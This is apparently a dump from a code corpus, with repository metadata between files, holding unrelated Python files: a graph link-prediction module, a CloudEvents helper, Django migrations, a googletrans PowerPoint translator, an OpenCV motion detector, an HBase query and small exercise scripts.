num_nodes = maybe_num_nodes(edge_index, num_nodes)
if edge_weight is None:
edge_weight = torch.ones((edge_index.size(1), ), dtype=dtype,
device=edge_index.device)
if add_self_loops:
edge_index, tmp_edge_weight = add_remaining_self_loops(
edge_index, edge_weight, fill_value, num_nodes)
assert tmp_edge_weight is not None
edge_weight = tmp_edge_weight
row, col = edge_index[0], edge_index[1]
deg = scatter_add(edge_weight, col, dim=0, dim_size=num_nodes)
deg_inv_sqrt = deg.pow_(-0.5)
deg_inv_sqrt.masked_fill_(deg_inv_sqrt == float('inf'), 0)
return edge_index, deg_inv_sqrt[row] * edge_weight * deg_inv_sqrt[col]
class TENET(nn.Module):
    """Self-supervised link-prediction module.

    During training it negative-samples edges, scores every (positive +
    negative) edge pair with a learned scaled dot product, and caches the
    scores/labels so ``get_link_prediction_loss`` can turn them into a
    BCE-with-logits auxiliary loss.  GCN normalization of ``edge_index`` is
    optionally applied (and cached) first.
    """

    # Cached normalized graph for the dense path: (edge_index, edge_weight).
    _cached_edge_index: Optional[Tuple[Tensor, Tensor]]
    # Cached normalized adjacency for the SparseTensor path.
    _cached_adj_t: Optional[SparseTensor]

    def __init__(self, improved: bool = False, cached: bool = False,
                 add_self_loops: bool = True, normalize: bool = True, **kwargs):
        super(TENET, self).__init__(**kwargs)
        self.improved = improved
        self.cached = cached
        self.add_self_loops = add_self_loops
        self.normalize = normalize
        self._cached_edge_index = None
        self._cached_adj_t = None
        # Five (scale, bias) pairs for stacking elu transforms on the raw
        # edge score; only the first pair is active in _get_edge_score (the
        # rest are kept for experimentation — see the commented lines there).
        self.r_scaling_1, self.r_bias_1 = Parameter(torch.Tensor(1)), Parameter(torch.Tensor(1))
        self.r_scaling_2, self.r_bias_2 = Parameter(torch.Tensor(1)), Parameter(torch.Tensor(1))
        self.r_scaling_3, self.r_bias_3 = Parameter(torch.Tensor(1)), Parameter(torch.Tensor(1))
        self.r_scaling_4, self.r_bias_4 = Parameter(torch.Tensor(1)), Parameter(torch.Tensor(1))
        self.r_scaling_5, self.r_bias_5 = Parameter(torch.Tensor(1)), Parameter(torch.Tensor(1))
        # Scratch cache read back by the static loss helper below.
        self.cache = {
            "num_updated": 0,
            "edge_score": None,  # Use as sij for edge score.
            "edge_label": None,  # Use as label for sij for supervision.
            "new_edge": None,
        }
        self.reset_parameters()

    def reset_parameters(self):
        """Reset caches and re-initialize scalings to 1 and biases to 0."""
        self._cached_edge_index = None
        self._cached_adj_t = None
        for name, param in self.named_parameters():
            if name.startswith("r_scaling"):
                tgi.ones(param)
            elif name.startswith("r_bias"):
                tgi.zeros(param)

    def forward(self, x: Tensor, edge_index: Adj,
                edge_weight: OptTensor = None):
        """Return (edge_score, edge_label) in training mode, (None, None) in eval.

        ``x``: node features; ``edge_index``: dense [2, E] Tensor or
        SparseTensor adjacency.
        """
        if self.normalize:
            if isinstance(edge_index, Tensor):
                cache = self._cached_edge_index
                if cache is None:
                    edge_index, edge_weight = gcn_norm(  # yapf: disable
                        edge_index, edge_weight, x.size(-2),
                        self.improved, self.add_self_loops, dtype=x.dtype)
                    if self.cached:
                        self._cached_edge_index = (edge_index, edge_weight)
                else:
                    edge_index, edge_weight = cache[0], cache[1]
            elif isinstance(edge_index, SparseTensor):
                cache = self._cached_adj_t
                if cache is None:
                    edge_index = gcn_norm(  # yapf: disable
                        edge_index, edge_weight, x.size(-2),
                        self.improved, self.add_self_loops, dtype=x.dtype)
                    if self.cached:
                        self._cached_adj_t = edge_index
                else:
                    edge_index = cache
        if self.training:
            # One negative sample per positive edge.
            # NOTE(review): negative_sampling and .size(1) assume a dense
            # [2, E] Tensor; the SparseTensor branch above would not satisfy
            # that — confirm callers only train with dense edge_index.
            num_neg_samples = int(edge_index.size(1))
            neg_edge_index = negative_sampling(
                edge_index=edge_index,
                num_nodes=x.size(0),
                num_neg_samples=num_neg_samples,
            )
            edge_score, edge_label, new_edge = self._get_edge_score_and_edge_label(x, edge_index, neg_edge_index)
            self._update_cache("edge_score", edge_score)
            self._update_cache("edge_label", edge_label)
            self._update_cache("new_edge", new_edge)
            return edge_score, edge_label
        else:
            return None, None

    def _update_cache(self, key, val):
        # Store the value and bump the update counter.
        self.cache[key] = val
        self.cache["num_updated"] += 1

    def __repr__(self):
        return '{}'.format(self.__class__.__name__)

    def _get_edge_score(self, x_i, x_j) -> torch.Tensor:
        """Scaled-elu dot-product score per edge (a logit, not a probability).

        :param x_i: [E, F]
        :param x_j: [E, F]
        :return: [E]
        """
        # Row-wise dot product of endpoint features.
        edge_score = torch.einsum("ef,ef->e", x_i, x_j)
        edge_score = self.r_scaling_1 * F.elu(edge_score) + self.r_bias_1
        # edge_score = self.r_scaling_2 * F.elu(edge_score) + self.r_bias_2
        # edge_score = self.r_scaling_3 * F.elu(edge_score) + self.r_bias_3
        # edge_score = self.r_scaling_4 * F.elu(edge_score) + self.r_bias_4
        # edge_score = self.r_scaling_5 * F.elu(edge_score) + self.r_bias_5
        # print('TOP', self.r_scaling_1, self.r_bias_1)
        return edge_score

    def _get_edge_score_and_edge_label(self, x, pos_edge_index, neg_edge_index):
        """Score positives followed by negatives; label positives 1, negatives 0.

        :param pos_edge_index: [2, E]
        :param neg_edge_index: [2, neg_E]]
        :return: [E + neg_E, 1]
        """
        total_edge_index = torch.cat([pos_edge_index, neg_edge_index], dim=-1)  # [2, E + neg_E]
        total_edge_index_j, total_edge_index_i = total_edge_index  # [E + neg_E]
        x_i = torch.index_select(input=x, dim=0, index=total_edge_index_i)  # [E + neg_E, heads * F]
        x_j = torch.index_select(input=x, dim=0, index=total_edge_index_j)  # [E + neg_E, heads * F]
        edge_score = self._get_edge_score(x_i, x_j)
        # Positives occupy the first pos_edge_index.size(1) slots.
        edge_label = torch.zeros_like(edge_score)
        edge_label[:pos_edge_index.size(1)] = 1
        # Negatives whose logit exceeds 10 are promoted to "new" edges.
        # NOTE(review): 10 is a magic threshold on raw logits — presumably
        # tuned; confirm against the training setup.
        edge_mask = edge_score > 10
        edge_mask = edge_mask[pos_edge_index.size(1):]
        new_edge = neg_edge_index[:, edge_mask]
        return edge_score, edge_label, new_edge

    @staticmethod
    def get_link_prediction_loss(model):
        """Sum BCE-with-logits losses over every TENET submodule of *model*,
        reading the scores/labels cached by the last forward pass."""
        loss_list = []
        cache_list = [(m, m.cache) for m in model.modules() if m.__class__.__name__ == TENET.__name__]
        device = next(model.parameters()).device
        # NOTE(review): BCEWithLogitsLoss must be imported earlier in this
        # file (likely from torch.nn) — not visible in this chunk.
        criterion = BCEWithLogitsLoss()
        for i, (module, cache) in enumerate(cache_list):
            score = cache["edge_score"]
            label = cache["edge_label"]
            # Shuffle scores and labels with the same permutation.
            num_total_samples = score.size(0)
            permuted = torch.randperm(num_total_samples)
            permuted = permuted.to(device)
            # print('Link pred loss: label[permuted]', label[permuted], label[permuted].shape)
            # print(label[label>0], label[label>0].shape)
            loss = criterion(score[permuted], label[permuted])
            loss_list.append(loss)
            del permuted
        return sum(loss_list)

    def get_edge_score(self, x, edge_index):
        """Public scoring helper: score the given edges without sampling."""
        edge_index_j, edge_index_i = edge_index  # [E + neg_E]
        x_i = torch.index_select(input=x, dim=0, index=edge_index_i)  # [E + neg_E, heads * F]
        x_j = torch.index_select(input=x, dim=0, index=edge_index_j)  # [E + neg_E, heads * F]
        edge_score = self._get_edge_score(x_i, x_j)
        return edge_score
"theorist17@gmail.com"
] | theorist17@gmail.com |
f0b6216d9f24d8fc4314980d5252ce702b88ae78 | e36c447b493ea3c311d022e39e2d70c743a12fd0 | /cloudevents/http/util.py | e3c2c82651231020a674038d3cf40c722393b40f | [
"Apache-2.0"
] | permissive | maartends/sdk-python | 079c027629840245ea479ddc1b82fdca64b41483 | 705e8b41004dba4f9a2dda0993205f9d610c7161 | refs/heads/master | 2023-07-17T18:57:08.008167 | 2021-09-02T22:58:52 | 2021-09-02T22:58:52 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 414 | py | import json
import typing
def default_marshaller(content: typing.Any) -> typing.Any:
    """Serialize *content* to a JSON string.

    ``None`` is returned unchanged, and anything that is not
    JSON-serializable (e.g. raw ``bytes``) is returned as-is instead of
    raising.

    Fix: the parameter was annotated with the builtin ``any`` *function*,
    which is not a type; ``typing.Any`` is the intended annotation.
    """
    if content is None:
        return None
    try:
        return json.dumps(content)
    except TypeError:
        # Not serializable: pass the payload through untouched.
        return content
def _json_or_string(content: typing.Union[str, bytes]):
if content is None:
return None
try:
return json.loads(content)
except (json.JSONDecodeError, TypeError):
return content
| [
"noreply@github.com"
] | noreply@github.com |
907454d9dea139929257601be42857808d6f7e5f | ff9317f4aaf98cb2c734136309aaea72285dd263 | /min_max.py | 37108c50fe6db2848fa89d965953b1af3dbf02f6 | [] | no_license | nblv1/1102 | 0179f84e286e26c79b559be082118d85253b117d | 26ac926714319b50ac5bf49e7e64a4e418681eb5 | refs/heads/master | 2021-05-01T10:50:44.004068 | 2018-02-25T20:19:29 | 2018-02-25T20:19:29 | 121,108,942 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 196 | py | import random
# NOTE(review): `import random` appears on the (truncated) first line of this
# file, which is why random is already usable here.  Most statements below
# discard their results — this reads as scratch/exercise code.
random.random()  # result discarded
import random  # re-import of an already-loaded module; harmless no-op
import math  # imported but never used
random.random()  # result discarded
# Sample data: mixed ints and floats.
a =[10,19,200,8899,28,990,29,0.1,19, 0.002, 1000,2]
max(a)  # result discarded
# Floor-divide the maximum by a random float in [0.0, 1.0); `//` between a
# number and a float yields a float.  A divisor of exactly 0.0 (possible in
# principle) would raise ZeroDivisionError.
b=max(a)//random.random()
print (max(a), random.random(), b) | [
"n.burban.v@gmail.com"
] | n.burban.v@gmail.com |
0071f862ae6ac7cc325b86470569b65e63a044cd | 573ae6c6056dedcac2f806a232026738f2193ccd | /about/migrations/0002_auto_20170627_1702.py | ec18052858f650573f1a243a84eb94379df54f59 | [] | no_license | HuaEla/web | b04c6676e3f2083eb8e605fbdc02c4748fdc68e3 | cde55ed487241f1557aedcd11c5aa9dde87031c9 | refs/heads/master | 2020-12-02T22:54:38.889881 | 2017-07-11T02:18:33 | 2017-07-11T02:18:33 | 96,199,528 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 422 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.10.6 on 2017-06-27 09:02
from __future__ import unicode_literals
from django.db import migrations
class Migration(migrations.Migration):
    """Auto-generated Django migration: renames ``SuperProfile.name`` to
    ``firstname`` (a pure rename — no data transformation)."""

    dependencies = [
        ('about', '0001_initial'),
    ]

    operations = [
        migrations.RenameField(
            model_name='superprofile',
            old_name='name',
            new_name='firstname',
        ),
    ]
| [
"894589363@qq.com"
] | 894589363@qq.com |
9552d20ca11425a227f4e404a2ba143391495cc5 | b9abf8417bda70aa978217d42ec843cadf8be7da | /ex032.py | 79257ad2efda32fa8c172b126d8f8da90d37aa8d | [] | no_license | TheDarktor/Ex-Python | d6fadcbf580e6b5a0d7848255f53c7f3a5f1d7ae | 1419f9a7ab3ff3366d89bc954e69abeb0b111fb9 | refs/heads/master | 2020-12-15T18:07:05.670700 | 2020-09-24T16:27:48 | 2020-09-24T16:27:48 | 235,204,306 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 620 | py | # Faça um programa que leia três números e mostre qual é o maior e qual é o menor.
# Read the three integers exactly as before.
n1 = int(input('Digite um número: '))
n2 = int(input('Digite um número: '))
n3 = int(input('Digite um número: '))
# Fix: the original chains of strict `<` / `>` comparisons never assigned
# `menor`/`maior` when two or more inputs were equal (e.g. 5, 5, 3), which
# raised NameError at the print below.  min()/max() handle ties correctly.
menor = min(n1, n2, n3)
maior = max(n1, n2, n3)
print('O menor número é {} e o maior é {}'.format(menor, maior))
| [
"noreply@github.com"
] | noreply@github.com |
b2bc3bca8d52e455d033d36e0bb434645d4a2414 | 112767762a536eabbfd361fb4ad9223abb9bee48 | /ppt_translator.py | 697c6886c869f01b8bd2b9832e2377da430ad60a | [] | no_license | bbiyongel/ppt_translator | af7872d10e5133ad0b872b49d91bab6e607e92ff | f5a506bd9d036ff3425fcb6c201dea85c36ffb55 | refs/heads/master | 2022-03-17T08:28:07.403129 | 2019-11-22T10:31:31 | 2019-11-22T10:31:31 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,025 | py | ## ppt_translator:
# A python script for translating a .ppt or .pptx file
## Setup:
# 1) Run file.reg to enable drag-and-drop conversion.
# 2) Install necessary Python 3.8 dependencies (i.e. pptx, googletrans, pandas,).
# 3) Drag and drop .ppt or .pptx file on top of ppt_translator.py.
# 4) Specify target language.
# 5) Open translated document!
## To do:
# preserve page numbers
# access hidden text frames
# give glossary lang labels
# highlight translated content for dubious translations
# if font is larger check if font of next run matches to concatenate
# replace "& \n" and "&\n" with "& "
## Troubleshooting:
# 1) JSONDecodeError: Expecting value: line 1 column 1 (char 0)
# Is usually caused because your IP address has been blocked by google.
# Try changing your IP address with a vpn or wait awhile.
# 2) TypeError: 'NoneType' object is not iterable
# Could be caused by extra spaces or weird characters within the powerpoint.
# -*- coding: utf-8 -*-
#! python3
# Dependencies:
from pptx import Presentation
from pptx.util import Pt
from googletrans import Translator
from googletrans.constants import LANGUAGES
import pandas
import os
import sys
import re
##2nd Level Helper Function
##takes input text
##returns input text translated to tgtLang
def translate_text(input_text, tgtLang):
    """Translate ``input_text`` into ``tgtLang``.

    Resolution order: memoized results (``query_dict``), the EN/ZH glossary
    lists, trivially skippable strings, then the Google Translate API.
    Relies on the module-level ``translator``, ``srcLang``, ``glossary`` and
    regex globals defined in the main section of this script.
    """
    print()
    print("1")
    print(input_text)
    # Remember the caller's original text: the string is normalized and
    # glossary-substituted below, and the memo must be keyed on the value
    # the caller will look up next time.  (The original code stored the
    # result under the *mutated* text, so the cache never produced hits.)
    original_text = input_text
    # input_text already translated
    if input_text in query_dict:
        output = query_dict[input_text]
    # input_text in glossary.EN:
    elif input_text in EN_glossary_as_list:
        output = ZH_glossary_as_list[EN_glossary_as_list.index(input_text)]
    # input_text in glossary.ZH:
    elif input_text in ZH_glossary_as_list:
        output = EN_glossary_as_list[ZH_glossary_as_list.index(input_text)]
    # input_text is empty
    elif input_text == "":
        output = input_text
    # NOTE(review): .match() only anchors at the *start*, so any text merely
    # beginning with a skippable/space character is returned untranslated;
    # .fullmatch() may have been intended — confirm before changing.
    elif skip_regex.match(input_text):
        output = input_text
    elif space_regex.match(input_text):
        output = input_text
    # detected lang != srcLang -> skip translation
    elif srcLang != translator.detect(input_text).lang:
        output = input_text
    # google translation is necessary
    else:
        # Trim trailing, then leading, whitespace one character at a time.
        while space_regex.match(input_text[-1]):
            input_text = input_text[:-1]
        while space_regex.match(input_text[0]):
            input_text = input_text[1:]
        # Collapse runs of spaces.  Fix: the original called the non-existent
        # str.Replace() (capital R), which raised AttributeError the moment
        # a double space was encountered.
        while "  " in input_text:
            input_text = input_text.replace("  ", " ")
        print("2")
        print(input_text)
        # Pre-substitute glossary terms so Google Translate leaves them fixed.
        if srcLang == "en" and tgtLang == "zh-cn":
            i = 0
            length = len(glossary.EN)
            while i < length:
                term_EN = glossary.EN[i]
                term_ZH = glossary.ZH[i]
                # term_EN is deliberately used as a regex pattern
                ##add "flags=re.IGNORECASE" to turn on case sensitivity##
                parts = re.split(term_EN, input_text)
                input_text = term_ZH.join(parts)
                i += 1
        elif srcLang == "zh-cn" and tgtLang == "en":
            i = 0
            length = len(glossary.ZH)
            while i < length:
                term_EN = glossary.EN[i]
                term_ZH = glossary.ZH[i]
                parts = input_text.split(term_ZH)
                input_text = term_EN.join(parts)
                i += 1
        print("3")
        print(input_text)
        print(srcLang)
        # TRANSLATE input_text to tgtLang
        output_raw = translator.translate(input_text, src=srcLang, dest=tgtLang)
        output = output_raw.text
        print("4")
        print(output)
        print("\n")
        # Memoize under the original text so future calls short-circuit.
        query_dict[original_text] = output
    return output
##1st Level Helper Function
def translate_ppt(pptfname, tgtLang):
    """Translate every text run in ``pptfname`` into ``tgtLang``.

    The result is saved incrementally to ``<pre>_<tgtLang><ext>`` (the
    module-level ``pre``/``ext`` path globals), so a crash mid-run still
    leaves a partially translated deck.  Tables are handled per paragraph;
    ordinary text frames per run, preserving font size, bold/italic and
    theme color.
    """
    prs = Presentation(pptfname)
    out_path = pre + "_" + tgtLang + ext
    prs.save(out_path)
    for slide in prs.slides:
        # PROGRESS LOGGING (single console line, rewritten with \r).
        curr_slide_num = prs.slides.index(slide)
        total_slide_num = len(prs.slides)
        string1 = ("Translating slide [{0}] \r".format(str(curr_slide_num + 1) + " / " + str(total_slide_num)))
        sys.stdout.write(string1)
        sys.stdout.flush()
        for shape in slide.shapes:
            # Tables: translate each cell paragraph as a whole.
            if shape.has_table:
                table = shape.table
                for cell in table.iter_cells():
                    for paragraph in cell.text_frame.paragraphs:
                        # READ formatting before the paragraph is cleared.
                        read_text = paragraph.text
                        read_font_size = paragraph.font.size
                        is_bold = paragraph.font.bold
                        is_italic = paragraph.font.italic
                        font_color = None
                        # Fix: the original referenced `read_run` here — a
                        # name that is undefined in this scope (or stale from
                        # a previous text-frame loop), raising NameError or
                        # copying the wrong run's color for colored tables.
                        if paragraph.font.color.type is not None:
                            font_color = paragraph.font.color.theme_color
                        # TRANSLATE:
                        translated_text = translate_text(read_text, tgtLang)
                        prs.save(out_path)
                        paragraph.clear()
                        # WRITE: one new run carrying the saved formatting.
                        write_run = paragraph.add_run()
                        write_run.text = translated_text
                        font = write_run.font
                        font.size = read_font_size
                        font.bold = is_bold
                        font.italic = is_italic
                        if font_color is not None:
                            font.color.theme_color = font_color
            # Shapes without a text frame (tables included) are finished here.
            if not shape.has_text_frame:
                continue
            # Ordinary text frames: translate run by run.
            for paragraph in shape.text_frame.paragraphs:
                paragraphRuns = paragraph.runs
                paragraph.clear()
                for read_run in paragraphRuns:
                    # READ (the detached run objects still expose their text
                    # and font after paragraph.clear()).
                    read_text = read_run.text
                    read_font_size = read_run.font.size
                    is_bold = read_run.font.bold
                    is_italic = read_run.font.italic
                    font_color = None
                    if read_run.font.color.type is not None:
                        font_color = read_run.font.color.theme_color
                    # TRANSLATE:
                    translated_text = translate_text(read_text, tgtLang)
                    prs.save(out_path)
                    # WRITE:
                    write_run = paragraph.add_run()
                    write_run.text = translated_text
                    font = write_run.font
                    font.size = read_font_size
                    font.bold = is_bold
                    font.italic = is_italic
                    if font_color is not None:
                        font.color.theme_color = font_color
    prs.save(out_path)
##MAIN##
#prevents command line from exiting upon error
def show_exception_and_exit(exc_type, exc_value, tb):
    """``sys.excepthook`` replacement: print the traceback, wait for
    <return> so a double-clicked console window stays open, then exit
    with status -1."""
    import traceback
    traceback.print_exception(exc_type, exc_value, tb)
    input("Press <return> to exit...")
    sys.exit(-1)
# Install the pause-on-error hook defined above.
sys.excepthook = show_exception_and_exit
# takes argv[1] as fileDir
if len(sys.argv) > 1:
    fileDir = sys.argv[1]
    print(fileDir)
    print()
else:
    raise Exception('To translate, drag and drop a ppt or pptx file onto ppt_translator.py!')
# import glossary.csv (expected next to this script)
cwd = os.path.dirname(os.path.realpath(__file__))
glossary_abs_dir = os.path.join(cwd, "glossary.csv")
###convert glossary.csv columns to lists for quick lookup
glossary = pandas.read_csv(glossary_abs_dir, names=['ZH','EN'])
ZH_glossary_as_list = glossary.ZH.values.tolist()
EN_glossary_as_list = glossary.EN.values.tolist()
###TODO: allow for multiple columns/languages
# regex for skipping spaces, tabs and empty strings
# NOTE(review): the character class below is broken — the `]` inside
# `()[]{}` closes the class early, so the rest (`{}"':;...`) is matched as
# literal text and this pattern almost never matches.  The inner `]` and the
# `0-_` range need escaping (`\]`, `0\-_`) — confirm intended behavior
# before fixing.
skip_regex = re.compile(r'''(
[ 1234567890-_+=!@#$%^&*()[]{}"':;.,/?<>~`—]+
)''', re.VERBOSE)
space_regex = re.compile(r'''(
[\s]+
)''', re.VERBOSE)
# establish translator function
translator = Translator()
#dictionary for searched srcLang tgtLang data
query_dict ={}
#check if file is ppt or pptx
pre, ext = os.path.splitext(fileDir)
if ext == '.pptx' or ext == '.ppt':
    # NOTE(review): the prompt advertises "<return> for input detection",
    # but an empty srcLang is not in LANGUAGES, so the while loop below
    # forces an explicit choice — detection is never actually used here.
    srcLang = input("\nSource language?\n(press <return> for input detection)\n" )
    tgtLang = input("\nTarget language?\n" )
    srcLang = srcLang.lower()
    tgtLang = tgtLang.lower()
    # Map a full language name (value) to its code (key); the second `if`
    # is a no-op kept from the original (`tgtLang = k` when already equal).
    for k, v in LANGUAGES.items():
        if tgtLang == v:
            tgtLang = k
        if tgtLang == k:
            tgtLang = k
    # while loop to make sure tgtLang variable is contained in LANGUAGES
    while tgtLang not in LANGUAGES:
        print("\n")
        for v in LANGUAGES.values():
            print(v)
        tgtLang = input("\nPlease choose one of the target languages above.\n" )
        tgtLang = tgtLang.lower()
        for k, v in LANGUAGES.items():
            if tgtLang == v:
                tgtLang = k
            if tgtLang == k:
                tgtLang = k
    # Same name->code mapping for the source language.
    for k, v in LANGUAGES.items():
        if srcLang == v:
            srcLang = k
        if srcLang == k:
            srcLang = k
    # while loop to make sure srcLang variable is contained in LANGUAGES
    while srcLang not in LANGUAGES:
        print("\n")
        for v in LANGUAGES.values():
            print(v)
        srcLang = input("\nPlease choose one of the target languages above.\n" )
        srcLang = srcLang.lower()
        for k, v in LANGUAGES.items():
            if srcLang == v:
                srcLang = k
            if srcLang == k:
                srcLang = k
    #translate ppt
    translate_ppt(fileDir, tgtLang)
| [
"noreply@github.com"
] | noreply@github.com |
46b27ee5bba75e2224f1978fca595c6d497705d3 | 86ac9ab4b947c959742eaf0fdc4eebf7b670c3f3 | /motion_detector.py | bd30ed3bd2ee2ef9884756af5565ef17013c0ce8 | [] | no_license | CBlagden/PhysicsFun | fc8f0c139d8feefeb5f26639cabbc204061399d3 | 21ec816c82380390b3e31d790ec27b7b76320727 | refs/heads/master | 2020-03-26T17:46:44.271544 | 2018-11-16T23:44:39 | 2018-11-16T23:44:39 | 145,179,878 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,905 | py | # import the necessary packages
from imutils.video import VideoStream
import argparse
import datetime
import imutils
import time
import cv2
# construct the argument parser and parse the arguments
ap = argparse.ArgumentParser()
ap.add_argument("-v", "--video", help="path to the video file")
ap.add_argument("-a", "--min-area", type=int, default=500, help="minimum area size")
args = vars(ap.parse_args())
# if the video argument is None, then we are reading from webcam
if args.get("video", None) is None:
vs = VideoStream(src=0).start()
time.sleep(2.0)
# otherwise, we are reading from a video file
else:
vs = cv2.VideoCapture(args["video"])
# initialize the first frame in the video stream
firstFrame = None
# loop over the frames of the video
while True:
# grab the current frame and initialize the occupied/unoccupied
# text
frame = vs.read()
frame = frame if args.get("video", None) is None else frame[1]
text = "Unoccupied"
# if the frame could not be grabbed, then we have reached the end
# of the video
if frame is None:
break
# resize the frame, convert it to grayscale, and blur it
frame = imutils.resize(frame, width=500)
gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
gray = cv2.GaussianBlur(gray, (21, 21), 0)
# if the first frame is None, initialize it
if firstFrame is None:
firstFrame = gray
continue
# compute the absolute difference between the current frame and
# first frame
frameDelta = cv2.absdiff(firstFrame, gray)
thresh = cv2.threshold(frameDelta, 25, 255, cv2.THRESH_BINARY)[1]
# dilate the thresholded image to fill in holes, then find contours
# on thresholded image
thresh = cv2.dilate(thresh, None, iterations=2)
cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,
cv2.CHAIN_APPROX_SIMPLE)
cnts = cnts[0] if imutils.is_cv2() else cnts[1]
# loop over the contours
for c in cnts:
# if the contour is too small, ignore it
if cv2.contourArea(c) < args["min_area"]:
continue
# compute the bounding box for the contour, draw it on the frame,
# and update the text
(x, y, w, h) = cv2.boundingRect(c)
cv2.rectangle(frame, (x, y), (x + w, y + h), (0, 255, 0), 2)
text = "Occupied"
# draw the text and timestamp on the frame
cv2.putText(frame, "Room Status: {}".format(text), (10, 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.5, (0, 0, 255), 2)
cv2.putText(frame, datetime.datetime.now().strftime("%A %d %B %Y %I:%M:%S%p"),
(10, frame.shape[0] - 10), cv2.FONT_HERSHEY_SIMPLEX, 0.35, (0, 0, 255), 1)
# show the frame and record if the user presses a key
cv2.imshow("Security Feed", frame)
cv2.imshow("Thresh", thresh)
cv2.imshow("Frame Delta", frameDelta)
key = cv2.waitKey(1) & 0xFF
# if the `q` key is pressed, break from the lop
if key == ord("q"):
break
# cleanup the camera and close any open windows
vs.stop() if args.get("video", None) is None else vs.release()
cv2.destroyAllWindows() | [
"chase.blagden@gmail.com"
] | chase.blagden@gmail.com |
88c15922e1ee75ebfb41e099ea00d47e724e76b3 | 1118aec39a839da2ebc508f1d2a6b377aa70274d | /src/package/__init__.py | 9fe1791f5d03e16137cad53f29e2539c8bf69b31 | [] | no_license | serg0987/python | b3a9a2b22b4ef5a39e612a0a170ba9629933c802 | 074449ad6b3a90352939c55a9db37bd248cab428 | refs/heads/master | 2020-05-15T09:30:17.500158 | 2015-10-18T21:28:08 | 2015-10-18T21:28:08 | 2,454,952 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 62 | py | '''
Created on Dec 16, 2011
@author: serg
'''
init = 'INIT' | [
"serg0987@gmail.com"
] | serg0987@gmail.com |
6b8be3ce5a2307b8c3529e0eb27f4790497e0059 | 5eb29ce7104e10a399d9afd7e253f029bf8bc0ff | /scripts/tests/test_get_sim.py | fd8d224e2bcce56d015705e64cd8d67421aa30a1 | [
"BSD-2-Clause"
] | permissive | svebk/DeepSentiBank_memex | 69789dc09316e97aad711edeb251837a60184e7e | 4e69ce66e3a177817ff360ddc263f55c6e0b63f7 | refs/heads/master | 2021-01-18T18:55:10.870052 | 2017-10-19T22:51:29 | 2017-10-19T22:51:29 | 36,091,024 | 22 | 1 | null | 2017-02-09T20:31:20 | 2015-05-22T19:20:54 | Python | UTF-8 | Python | false | false | 350 | py | import happybase
if __name__=="__main__":
tab_image = 'escorts_images_similar_row'
conn = happybase.Connection(host='10.1.94.57')
image_sha1s = '1000013C0A38D8DACAEC31360AFAFEB5DC3D712B'
table = conn.table(tab_image)
row = table.row(image_sha1s,columns=['s'])
print len(row.keys()),[x.split(':')[-1] for x in row.keys()]
| [
"svebor.karaman@gmail.com"
] | svebor.karaman@gmail.com |
b61ce073d9bde964a62fc5156e853ebf5fdb4439 | ce9593eb4ec109b86f3f75ac161a372e6d99f067 | /Problems/Make the function work/main.py | 587662f9829f06fd6bc6ba0c9f8c123d4beb5563 | [] | no_license | wangpengda1210/Rock-Paper-Scissors | 0b2e5ef9b946dd209a85fa7440a7e40acfd83923 | 05c558ddfdf69eb4170185a158ded8a3a063359c | refs/heads/main | 2023-02-20T08:35:09.379752 | 2021-01-23T06:31:48 | 2021-01-23T06:31:48 | 332,143,586 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 104 | py | def closest_higher_mod_5(x):
    # Scan upward one integer at a time until a multiple of 5 is reached;
    # for any integer x this terminates within five iterations and returns
    # x itself when x is already divisible by 5.
    while True:
        if x % 5 == 0:
            return x
        x += 1
| [
"515484505@qq.com"
] | 515484505@qq.com |
d7c13d81e2288f3406197df838462de7876c6ad2 | 0f4168b2c87ad8b947f3442a978349edd7641e5c | /fspider/migrations/0004_office_shop_villa.py | b5f491845408080c488f912efa5c83142e20770c | [] | no_license | VegetaPn/fangSpider | 056fb8d95d2e340d8f8f07c738d3bfeb463dfac5 | 3180340e984e07a670953333a096bf69c926552d | refs/heads/master | 2021-03-16T05:11:03.871178 | 2017-07-15T13:35:56 | 2017-07-15T13:35:56 | 76,744,360 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,036 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9.7 on 2016-12-17 17:41
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated Django migration adding the Office, Shop and Villa
    models — three real-estate listing tables with 'N/A'/zero defaults for
    scraped fields that may be absent."""

    dependencies = [
        ('fspider', '0003_auto_20161217_1721'),
    ]

    operations = [
        migrations.CreateModel(
            name='Office',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('name', models.CharField(default='N/A', max_length=100)),
                ('category', models.CharField(default='N/A', max_length=100)),
                ('area', models.IntegerField(default=0)),
                ('parking', models.CharField(default='N/A', max_length=100)),
                ('href', models.CharField(default='', max_length=200)),
            ],
        ),
        migrations.CreateModel(
            name='Shop',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('name', models.CharField(default='N/A', max_length=100)),
                ('category', models.CharField(default='N/A', max_length=100)),
                ('area', models.IntegerField(default=0)),
                ('parking', models.CharField(default='N/A', max_length=100)),
                ('href', models.CharField(default='', max_length=200)),
            ],
        ),
        migrations.CreateModel(
            name='Villa',
            fields=[
                ('id', models.AutoField(primary_key=True, serialize=False)),
                ('name', models.CharField(default='N/A', max_length=100)),
                ('area', models.IntegerField(default=0)),
                ('households', models.IntegerField(default=0)),
                ('volume_rate', models.DecimalField(decimal_places=2, default=0.0, max_digits=5)),
                ('greening_rate', models.DecimalField(decimal_places=2, default=0.0, max_digits=5)),
                ('href', models.CharField(default='', max_length=200)),
            ],
        ),
    ]
| [
"yhnkb@hotmail.com"
] | yhnkb@hotmail.com |
